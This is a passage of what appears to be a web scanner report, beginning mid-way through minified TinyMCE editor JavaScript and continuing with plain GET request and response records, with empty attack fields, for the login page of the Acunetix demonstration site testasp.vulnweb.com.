"mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
